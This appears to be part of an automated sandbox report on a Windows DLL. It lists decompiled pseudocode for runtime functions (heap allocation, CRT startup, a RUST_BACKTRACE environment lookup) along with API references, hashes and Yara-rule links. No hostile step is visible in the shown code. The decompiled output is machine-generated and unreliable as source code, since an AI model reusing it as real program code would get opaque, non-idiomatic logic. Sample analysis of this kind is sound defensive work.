											_t56 = E6ED11290(_t86, _t110, _t115, _t140,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t56;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_t59 = E6ED11290(_t86, _t110, _t115, _t140,  *((intOrPtr*)(_t123 + 8)), _t56, _t86);
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E6ED2CA96( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E6ED2C781(_t90,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E6ED2CA96( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x6ed6e174 - _t110; // 0x0
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E6ED2CFFD(1, _t90, 1, _t113);
								E6ED2CEB9();
								E6ED2D31B();
								 *0x6ed6e4b8 =  *0x6ed6e4b8 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E6ED2C970();
								_t67 = E6ED2D19E(_t90,  *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E6ED2C97D();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x6ed6e4b8 = 1;
						if(E6ED2CF8F(_t132) != 0) {
							E6ED2CEAD(E6ED2D2EF());
							E6ED2CED1();
							_t80 = E6ED30E51(0x6ed3a17c, 0x6ed3a18c); // executed
							_pop(_t102);
							if(_t80 == 0 && E6ED2CF64(1, _t102) != 0) {
								E6ED30E26(0x6ed3a158, 0x6ed3a178); // executed
								 *0x6ed6e4b8 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E6ED2C8B7();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E6ED2D1C6();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E6ED2D0ED(_t85, _t106, _t121, _t138) != 0) {
									 *0x6ed3a154( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x6ed6e174 =  *0x6ed6e174 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}

0x6ed2c7d4
0x6ed2c7d4
0x6ed2c7d4
0x6ed2c7d4
0x6ed2c7d4
0x6ed2c7db
0x6ed2c7e2
0x6ed2c7e7
0x6ed2c7ea
0x6ed2c8c1
0x6ed2c8c1
0x6ed2c8c1
0x00000000
0x6ed2c7f0
0x6ed2c7f5
0x6ed2c7f8
0x6ed2c7fa
0x6ed2c7fd
0x6ed2c801
0x6ed2c808
0x6ed2c8d5
0x6ed2c8da
0x6ed2c8db
0x6ed2c8dd
0x6ed2c8e2
0x6ed2c8e7
0x6ed2c8ec
0x6ed2c8ee
0x6ed2c8f5
0x6ed2c8fd
0x6ed2c900
0x6ed2c909
0x6ed2c90c
0x6ed2c90f
0x6ed2c916
0x6ed2c985
0x6ed2c98a
0x6ed2c98b
0x6ed2c98d
0x6ed2c992
0x6ed2c997
0x6ed2c99a
0x6ed2c99c
0x6ed2c9ad
0x6ed2c9ad
0x6ed2c9b1
0x6ed2c9b4
0x6ed2c9c0
0x6ed2c9c0
0x6ed2c9cd
0x6ed2c9cf
0x6ed2c9d2
0x6ed2c9d4
0x6ed2c9df
0x6ed2c9e4
0x6ed2c9e6
0x6ed2c9e9
0x6ed2c9eb
0x00000000
0x00000000
0x6ed2c9eb
0x6ed2c9b6
0x6ed2c9b6
0x6ed2c9b9
0x00000000
0x6ed2c9bb
0x6ed2c9bb
0x6ed2c9f1
0x6ed2c9f6
0x6ed2c9fb
0x6ed2c9fd
0x6ed2ca00
0x6ed2ca03
0x6ed2ca05
0x6ed2ca07
0x6ed2ca0e
0x6ed2ca13
0x6ed2ca15
0x6ed2ca15
0x6ed2ca1b
0x6ed2ca1c
0x6ed2ca21
0x6ed2ca27
0x6ed2ca27
0x6ed2ca07
0x6ed2ca2c
0x6ed2ca2e
0x6ed2ca35
0x6ed2ca3f
0x6ed2ca41
0x6ed2ca44
0x6ed2ca46
0x6ed2ca52
0x6ed2ca7a
0x6ed2ca7a
0x6ed2ca30
0x6ed2ca30
0x6ed2ca33
0x00000000
0x00000000
0x6ed2ca33
0x6ed2ca2e
0x6ed2c9b9
0x6ed2ca7d
0x6ed2ca84
0x6ed2c99e
0x6ed2c99e
0x6ed2c9a4
0x00000000
0x6ed2c9a6
0x6ed2c9a6
0x6ed2c9a6
0x6ed2c9a4
0x6ed2ca89
0x6ed2ca95
0x6ed2c918
0x6ed2c918
0x6ed2c91d
0x6ed2c922
0x6ed2c927
0x6ed2c92e
0x6ed2c932
0x6ed2c93c
0x6ed2c948
0x6ed2c94a
0x6ed2c94a
0x6ed2c94c
0x6ed2c94f
0x6ed2c956
0x6ed2c95b
0x00000000
0x6ed2c95b
0x6ed2c8f0
0x6ed2c8f0
0x6ed2c95d
0x6ed2c960
0x6ed2c96c
0x6ed2c96c
0x6ed2c80e
0x6ed2c80e
0x6ed2c81f
0x6ed2c826
0x6ed2c82b
0x6ed2c83a
0x6ed2c840
0x6ed2c843
0x6ed2c858
0x6ed2c85f
0x6ed2c869
0x6ed2c86b
0x6ed2c86b
0x6ed2c843
0x6ed2c86e
0x6ed2c875
0x6ed2c87c
0x00000000
0x6ed2c87e
0x6ed2c883
0x6ed2c885
0x6ed2c888
0x6ed2c88a
0x6ed2c893
0x6ed2c8a1
0x6ed2c8a7
0x6ed2c8a7
0x6ed2c893
0x6ed2c8a9
0x6ed2c8b1
0x6ed2c8b1
0x6ed2c8c3
0x6ed2c8c6
0x6ed2c8d2
0x6ed2c8d2
0x6ed2c808

APIs

__RTC_Initialize.LIBCMT ref: 6ED2C821

Part of subcall function 6ED2CEAD: InitializeSListHead.KERNEL32(6ED6E4A0,6ED2C82B,6ED6AF60,00000010,6ED2C7BC,?,?,?,6ED2C9E4,?,00000001,?,?,00000001,?,6ED6AFA8), ref: 6ED2CEB2

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6ED2C88B

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 549c26650d1fdca2f66c6069d0ad3019c7443e6039f895f72f2579696e380482
Instruction ID: b58b437233e9e4609acb9f85247fbcdfc1468b7a514d971e14f5e35476b5138a
Opcode Fuzzy Hash: 549c26650d1fdca2f66c6069d0ad3019c7443e6039f895f72f2579696e380482
Instruction Fuzzy Hash: 74213532648245AEEF406BF4C8007DC73649F1736CF208C36D6502F2C2DB62C945DAB6

Uniqueness

Uniqueness Score: -1.00%

Function 6ED327F2, Relevance: 2.6, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6ED327F2(void* __ecx) {
				intOrPtr _t3;
				signed int _t4;
				signed int _t5;
				signed int _t6;
				signed int _t13;
				signed int _t14;
				long _t21;
				signed int _t23;

				_t21 = GetLastError();
				_t3 =  *0x6ed6d858; // 0xffffffff
				_t27 = _t3 - 0xffffffff;
				if(_t3 == 0xffffffff) {
					L4:
					_t4 = E6ED34526(__eflags, _t3, 0xffffffff);
					__eflags = _t4;
					if(_t4 != 0) {
						_t5 = E6ED32C26(1, 0x364); // executed
						_t23 = _t5;
						__eflags = _t23;
						if(__eflags != 0) {
							_t6 = E6ED34526(__eflags,  *0x6ed6d858, _t23);
							__eflags = _t6;
							if(_t6 != 0) {
								E6ED324A3(_t23, 0x6ed6eb54);
								E6ED32C83(0);
								_t14 = _t23;
							} else {
								_t14 = 0;
								__eflags = 0;
								E6ED34526(0,  *0x6ed6d858, 0);
								_push(_t23);
								goto L10;
							}
						} else {
							_t14 = 0;
							E6ED34526(__eflags,  *0x6ed6d858, 0);
							_push(0);
							L10:
							E6ED32C83();
						}
					} else {
						_t14 = 0;
					}
				} else {
					_t13 = E6ED344E7(_t27, _t3);
					if(_t13 == 0) {
						_t3 =  *0x6ed6d858; // 0xffffffff
						goto L4;
					} else {
						_t1 = _t13 + 1; // 0x1
						asm("sbb ebx, ebx");
						_t14 =  ~_t1 & _t13;
					}
				}
				SetLastError(_t21);
				return _t14;
			}

0x6ed327fc
0x6ed327fe
0x6ed32803
0x6ed32806
0x6ed32822
0x6ed32825
0x6ed3282a
0x6ed3282c
0x6ed3283a
0x6ed3283f
0x6ed32843
0x6ed32845
0x6ed3285f
0x6ed32864
0x6ed32866
0x6ed32885
0x6ed3288c
0x6ed32894
0x6ed32868
0x6ed32868
0x6ed32868
0x6ed32871
0x6ed32876
0x00000000
0x6ed32876
0x6ed32847
0x6ed32847
0x6ed32850
0x6ed32855
0x6ed32877
0x6ed32877
0x6ed3287c
0x6ed3282e
0x6ed3282e
0x6ed3282e
0x6ed32808
0x6ed32809
0x6ed32810
0x6ed3281d
0x00000000
0x6ed32812
0x6ed32812
0x6ed32817
0x6ed32819
0x6ed32819
0x6ed32810
0x6ed32898
0x6ed328a2

APIs

GetLastError.KERNEL32(?,00000001,6ED31FD4,6ED3232C,?,?,6ED2CB0C,?,?,6ED2C074,00000400,FFFDC801,?,?,00000001), ref: 6ED327F6
SetLastError.KERNEL32(00000000,?,00000001), ref: 6ED32898

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 8d0acaed3a8f0a7eda0d90fbd3dcdac3de00051e2b97ddd5d3e2d05a67d93c3a
Instruction ID: a7159aba56a9d8da64d90279d40a1463df7df07220306a793969556ef620127a
Opcode Fuzzy Hash: 8d0acaed3a8f0a7eda0d90fbd3dcdac3de00051e2b97ddd5d3e2d05a67d93c3a
Instruction Fuzzy Hash: A011E531E05631AEEA906BF5DCC4D9A27ACDB432FDB300636F5148B090DB158907C5F0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED32C26, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED32C26(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6ed6e938, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6ED354DC();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6ED31FCF())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6ED30E8E(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x6ed32c2c
0x6ed32c31
0x6ed32c3f
0x6ed32c3f
0x6ed32c45
0x6ed32c47
0x6ed32c47
0x6ed32c5e
0x6ed32c67
0x6ed32c6f
0x00000000
0x00000000
0x6ed32c4f
0x6ed32c51
0x6ed32c73
0x6ed32c78
0x6ed32c7e
0x00000000
0x6ed32c7e
0x6ed32c54
0x6ed32c5a
0x6ed32c5c
0x00000000
0x00000000
0x6ed32c5c
0x00000000
0x6ed32c5e
0x6ed32c37
0x6ed32c3d
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,6ED3283F,00000001,00000364,?,FFFFFFFF,000000FF,?,?,6ED2CB0C,?,?,6ED2C074), ref: 6ED32C67

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a8a1d6b34089741f3e1f99ca92dbeacac008bc882879c01846ed883acc357376
Instruction ID: b7ee5650d3bf2416a9500d8f359f1c15ab47b27fb736b83aa659d327e96cbe18
Opcode Fuzzy Hash: a8a1d6b34089741f3e1f99ca92dbeacac008bc882879c01846ed883acc357376
Instruction Fuzzy Hash: 0EF0B432A05936EAEB555BF68C04B9B37589F43768B308512F814A7184CB32D50182F5

Uniqueness

Uniqueness Score: -1.00%

Function 6ED322E9, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED322E9(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6ED31FCF())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6ed6e938, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6ED354DC();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E6ED30E8E(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x6ed322ef
0x6ed322f5
0x6ed32327
0x6ed3232c
0x6ed32332
0x00000000
0x6ed32332
0x6ed322f9
0x6ed322fb
0x6ed322fb
0x6ed32312
0x6ed3231b
0x6ed32323
0x00000000
0x00000000
0x6ed32303
0x6ed32305
0x00000000
0x00000000
0x6ed32308
0x6ed3230e
0x6ed32310
0x00000000
0x00000000
0x6ed32310
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,6ED2CB0C,?,?,6ED2C074,00000400,FFFDC801,?,?,00000001), ref: 6ED3231B

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 768951aa154b99a1ab89242f50fe11c7ad9d656328ee36ffe583379a9e75403e
Instruction ID: 38d48ad2dd6cfd9e00af5fc35f775bab419f84c2e8ec1b1defa609f5dbd1565a
Opcode Fuzzy Hash: 768951aa154b99a1ab89242f50fe11c7ad9d656328ee36ffe583379a9e75403e
Instruction Fuzzy Hash: 3EE06531A45636DAFA5627E68C0479AB76CAF437E9F310125ED5497184DB20D40181F1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2BE30, Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

BasepGetAppCompatData.KERNEL32(?,?,?,?,00000000,0000000F), ref: 6ED2BE56

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: BasepCompatData
String ID:
API String ID: 1597993171-0
Opcode ID: 90588a941a8ea14ef5ba9413fd927c678413664d5336dbfc93a0725336cb93fe
Instruction ID: c57b184de47a4b4539c4da12c34f950e39fdd5ea58a5fd0eaa31434396e30821
Opcode Fuzzy Hash: 90588a941a8ea14ef5ba9413fd927c678413664d5336dbfc93a0725336cb93fe
Instruction Fuzzy Hash: 0AD09E75004202AADE424FA0AE0090E7BA2AFC5A15F400D28B760600F4D763C925FB23

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6ED1D380, Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 445
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E6ED1D380(signed int __ebx, long* __ecx, signed int __edi, long __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				long _v40;
				void* _v44;
				void* _v48;
				long _v52;
				signed int _v56;
				void* _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				long* _v76;
				signed int _v80;
				signed int _v1096;
				long _v1100;
				void* _v1104;
				void* __ebp;
				void* _t142;
				void* _t143;
				void* _t148;
				signed int _t149;
				intOrPtr _t151;
				void* _t155;
				void* _t157;
				signed int _t158;
				signed int _t160;
				void** _t161;
				void* _t167;
				long _t171;
				signed int _t172;
				long _t173;
				void* _t179;
				void* _t181;
				long _t194;
				signed int _t195;
				signed char _t196;
				signed int _t199;
				signed int _t200;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				void* _t218;
				intOrPtr _t220;
				signed int _t223;
				intOrPtr* _t224;
				intOrPtr _t226;
				signed int _t228;
				char* _t229;
				signed int _t230;
				signed int _t232;
				signed int _t238;
				signed int _t241;
				signed int _t242;
				WCHAR* _t247;
				long _t248;
				signed int _t249;
				signed int _t252;
				char* _t264;
				void* _t265;
				void* _t267;
				void* _t268;
				signed char* _t273;
				signed int _t274;
				void* _t280;
				intOrPtr _t281;

				_t262 = __esi;
				_t245 = __edi;
				_t192 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t281 = _t280 - 0x440;
				_v32 = _t281;
				_v20 = 0xffffffff;
				_v24 = E6ED239D0;
				_v76 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t142 =  *0x6ed6e128; // 0x810000
				if(_t142 != 0) {
					L3:
					_t143 = HeapAlloc(_t142, 0, 0xa);
					if(_t143 == 0) {
						goto L94;
					} else {
						_t264 = "UST_BACKTRACE";
						_t241 = 1;
						_t211 = 0;
						 *_t143 = 0x52;
						_v1104 = _t143;
						_v1100 = 5;
						_v1096 = 1;
						_v44 = 0;
						while(1) {
							_v36 = _t211;
							if(_t211 == 0) {
								goto L10;
							}
							_v44 = 0;
							_t211 = 0;
							if(_t241 != _v1100) {
								L6:
								_t245 = _v36;
								 *((short*)(_t143 + _t241 * 2)) = _v36;
								_t241 = _t241 + 1;
								_v1096 = _t241;
								continue;
							} else {
								L13:
								_v40 = _t264;
								_v20 = 0;
								_v48 = _t241;
								_t188 =  <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11;
								_t189 = ( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2;
								asm("sbb eax, 0x0");
								_t190 = (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2;
								E6ED39A30( &_v1104, _t241, (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2);
								_t281 = _t281 + 4;
								_t143 = _v1104;
								_t241 = _v48;
								_t264 = _v40;
								_t211 = _v44;
								goto L6;
							}
							L10:
							__eflags = _t264 - 0x6ed5face;
							if(_t264 != 0x6ed5face) {
								_t196 =  *_t264 & 0x000000ff;
								_t229 =  &(_t264[1]);
								_t249 = _t196 & 0x000000ff;
								__eflags = _t196;
								if(_t196 < 0) {
									_v36 = _t249 & 0x0000001f;
									__eflags = _t229 - 0x6ed5face;
									if(_t229 == 0x6ed5face) {
										_t230 = 0;
										__eflags = _t196 - 0xdf;
										_t252 = 0;
										_v40 = 0x6ed5face;
										if(_t196 > 0xdf) {
											goto L25;
										} else {
											_v36 = _v36 << 6;
											_t264 = 0x6ed5face;
											_t211 = 0;
											__eflags = _t241 - _v1100;
											if(_t241 != _v1100) {
												goto L6;
											} else {
												goto L13;
											}
										}
									} else {
										_t238 = _t264[1] & 0x000000ff;
										_t264 =  &(_t264[2]);
										_t230 = _t238 & 0x0000003f;
										__eflags = _t196 - 0xdf;
										if(_t196 <= 0xdf) {
											_t199 = _v36 << 0x00000006 | _t230;
											__eflags = _t199 - 0xffff;
											if(_t199 > 0xffff) {
												goto L32;
											} else {
												goto L22;
											}
										} else {
											__eflags = _t264 - 0x6ed5face;
											if(_t264 == 0x6ed5face) {
												_t252 = 0;
												__eflags = 0;
												_v40 = 0x6ed5face;
											} else {
												_v40 =  &(_t264[1]);
												_t252 =  *_t264 & 0x3f;
											}
											L25:
											_t232 = _t230 << 0x00000006 | _t252;
											__eflags = _t196 - 0xf0;
											if(_t196 < 0xf0) {
												_t199 = _v36 << 0x0000000c | _t232;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 > 0xffff) {
													goto L32;
												} else {
													goto L22;
												}
											} else {
												_t273 = _v40;
												__eflags = _t273 - 0x6ed5face;
												if(_t273 == 0x6ed5face) {
													_t274 = 0;
													__eflags = 0;
													_v40 = 0x6ed5face;
												} else {
													_v40 =  &(_t273[1]);
													_t274 =  *_t273 & 0x3f;
												}
												_t199 = _t232 << 0x00000006 | (_v36 & 0x00000007) << 0x00000012 | _t274;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 <= 0xffff) {
													L22:
													_v36 = _t199;
													_t211 = 0;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												} else {
													L32:
													_t200 = _t199 + 0xffff0000;
													_v40 = _t264;
													_v36 = _t200 >> 0x0000000a | 0x0000d800;
													_t264 = _v40;
													_t211 = _t200 & 0x000003ff | 0x0000dc00;
													_v44 = _t211;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								} else {
									_t264 = _t229;
									_v36 = _t249;
									_t211 = 0;
									__eflags = _t241 - _v1100;
									if(_t241 != _v1100) {
										goto L6;
									} else {
										goto L13;
									}
								}
								goto L96;
							}
							_t242 = _v1096;
							asm("movsd xmm0, [ebp-0x44c]");
							_v64 = _t242;
							asm("movsd [ebp-0x44], xmm0");
							__eflags = _t242 - 8;
							_t213 = _t242;
							_t148 = _v72;
							_t265 = _t148;
							if(_t242 < 8) {
								L45:
								_t214 = _t213 + _t213;
								asm("o16 nop [cs:eax+eax]");
								while(1) {
									__eflags = _t214;
									if(_t214 == 0) {
										break;
									}
									_t214 = _t214 + 0xfffffffe;
									__eflags =  *_t265;
									_t265 = _t265 + 2;
									if(__eflags != 0) {
										continue;
									} else {
										goto L48;
									}
									goto L96;
								}
								__eflags = _t242 - _v68;
								if(_t242 == _v68) {
									_v20 = 1;
									E6ED39A30( &_v72, _t242, 1);
									_t281 = _t281 + 4;
									_t148 = _v72;
									_t242 = _v64;
								}
								 *((short*)(_t148 + _t242 * 2)) = 0;
								asm("movsd xmm0, [ebp-0x44]");
								asm("movsd [ebp-0x38], xmm0");
								_t149 = _v60;
								__eflags = _t149;
								_v36 = _t149;
								if(_t149 == 0) {
									goto L75;
								} else {
									_v80 = _v56;
									E6ED2E9D0(_t245,  &_v1104, 0, 0x400);
									_t281 = _t281 + 0xc;
									_t155 =  *0x6ed5f8cc; // 0x2
									_t194 = 0x200;
									_t262 = 0;
									_v60 = _t155;
									_v56 = 0;
									_v48 = _t155;
									_v52 = 0;
									__eflags = 0x200 - 0x201;
									if(0x200 >= 0x201) {
										L65:
										_t157 = _t194 - _t262;
										__eflags = _v56 - _t262 - _t157;
										if(_v56 - _t262 < _t157) {
											_v44 = _t194;
											_v20 = 5;
											E6ED39A30( &_v60, _t262, _t157);
											_t281 = _t281 + 4;
											_t194 = _v44;
											_v48 = _v60;
										}
										_t247 = _v48;
										_t262 = _t194;
										_v52 = _t194;
										_v40 = _t194;
									} else {
										L68:
										_t247 =  &_v1104;
										_v40 = 0x200;
									}
									L69:
									_v44 = _t247;
									SetLastError(0);
									_t158 = GetEnvironmentVariableW(_v36, _t247, _t194);
									_t245 = _t158;
									__eflags = _t158;
									if(_t158 != 0) {
										L71:
										__eflags = _t245 - _t194;
										if(_t245 != _t194) {
											L63:
											__eflags = _t245 - _t194;
											_t192 = _t245;
											if(_t245 < _t194) {
												_t239 = _v40;
												_v20 = 5;
												__eflags = _t245 - _v40;
												if(__eflags > 0) {
													goto L95;
												} else {
													_push(_t245);
													E6ED20D10(_t192,  &_v72, _v44, _t245, _t262);
													_t281 = _t281 + 4;
													_t218 = _v72;
													_t248 = _v68;
													_t262 = _v64;
													_t195 = 0;
													_t160 = _v56;
													__eflags = _t160;
													if(_t160 != 0) {
														goto L81;
													} else {
													}
													goto L84;
												}
											} else {
												__eflags = _t192 - 0x201;
												if(_t192 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										} else {
											_t171 = GetLastError();
											__eflags = _t171 - 0x7a;
											if(_t171 != 0x7a) {
												goto L63;
											} else {
												_t194 = _t194 + _t194;
												__eflags = _t194 - 0x201;
												if(_t194 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										}
									} else {
										_t172 = GetLastError();
										__eflags = _t172;
										if(_t172 != 0) {
											_t195 = 1;
											_t173 = GetLastError();
											_t218 = 0;
											_t248 = _t173;
											_t160 = _v56;
											__eflags = _t160;
											if(_t160 != 0) {
												L81:
												__eflags = _v48;
												if(_v48 != 0) {
													__eflags = _t160 & 0x7fffffff;
													if((_t160 & 0x7fffffff) != 0) {
														_v44 = _t218;
														HeapFree( *0x6ed6e128, 0, _v48);
														_t218 = _v44;
													}
												}
											}
											L84:
											__eflags = _t195;
											if(_t195 == 0) {
												_t161 = _v76;
												 *_t161 = _t218;
												_t161[1] = _t248;
												_t161[2] = _t262;
											} else {
												__eflags = _t218 - 3;
												 *_v76 = 0;
												if(_t218 == 3) {
													_v20 = 4;
													_v44 = _t248;
													 *((intOrPtr*)( *((intOrPtr*)(_t248 + 4))))( *_t248);
													_t281 = _t281 + 4;
													_t267 = _v44;
													_t220 =  *((intOrPtr*)(_t267 + 4));
													__eflags =  *(_t220 + 4);
													if( *(_t220 + 4) != 0) {
														_t167 =  *_t267;
														__eflags =  *((intOrPtr*)(_t220 + 8)) - 9;
														if( *((intOrPtr*)(_t220 + 8)) >= 9) {
															_t167 =  *(_t167 - 4);
														}
														HeapFree( *0x6ed6e128, 0, _t167);
													}
													HeapFree( *0x6ed6e128, 0, _t267);
												}
											}
											__eflags = _v80 & 0x7fffffff;
											if((_v80 & 0x7fffffff) != 0) {
												HeapFree( *0x6ed6e128, 0, _v36);
											}
											goto L76;
										} else {
											goto L71;
										}
									}
								}
							} else {
								_t228 = _t242;
								_t268 = _t148;
								while(1) {
									__eflags =  *_t268;
									if( *_t268 == 0) {
										break;
									}
									__eflags =  *((short*)(_t268 + 2));
									if( *((short*)(_t268 + 2)) == 0) {
										break;
									} else {
										__eflags =  *((short*)(_t268 + 4));
										if( *((short*)(_t268 + 4)) == 0) {
											break;
										} else {
											__eflags =  *((short*)(_t268 + 6));
											if( *((short*)(_t268 + 6)) == 0) {
												break;
											} else {
												__eflags =  *((short*)(_t268 + 8));
												if( *((short*)(_t268 + 8)) == 0) {
													break;
												} else {
													__eflags =  *((short*)(_t268 + 0xa));
													if( *((short*)(_t268 + 0xa)) == 0) {
														break;
													} else {
